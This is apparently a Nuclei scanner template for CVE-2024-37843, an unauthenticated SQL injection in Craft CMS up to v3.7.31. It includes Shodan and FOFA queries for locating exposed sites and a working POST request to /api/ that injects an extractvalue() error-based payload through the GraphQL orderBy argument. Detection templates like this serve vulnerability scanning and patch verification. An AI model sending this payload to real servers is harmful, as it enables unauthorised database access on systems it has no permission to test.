id: CVE-2024-37843 info: name: Craft CMS <=v3.7.31 - SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint. impact: | Unauthenticated attackers can execute arbitrary SQL queries via the GraphQL API endpoint, potentially compromising the database. remediation: | Update Craft CMS to a version later than v3.7.31. reference: - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql - https://github.com/gsmith257-cyber/CVE-2024-37843-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-37843 cwe-id: CWE-89 epss-score: 0.89433 epss-percentile: 0.99565 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: vendor: craftcms product: craft_cms shodan-query: - cpe:"cpe:2.3:a:craftcms:craft_cms" - http.html:"craftcms" - http.favicon.hash:"-47932290" - "X-Powered-By: Craft CMS" fofa-query: - body=craftcms - icon_hash=-47932290 publicwww-query: craftcms tags: cve,cve2024,craftcms,sqli,vuln variables: matcher: "{{rand_base(4)}}" http: - raw: - | POST /api/ HTTP/1.1 Host: {{Hostname}} Content-Type:application/json {"query":"query IntrospectionQuery {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"} skip-variables-check: true matchers-condition: and matchers: - type: word part: body words: - "General error: 1105 XPATH syntax error: '\\n{{matcher}}" - type: word part: content_type words: - "application/json" # digest: 4a0a0047304502204e5eb8da80c4c0ad79747d0081751047c0eaccab34a00068f462fb14e381df53022100df7c68ddc91f379d0ab2d89fdb700efb8e9397ce357ae84d3eccf1c22913a4b1:922c64590222798bb761d5b6d8e72950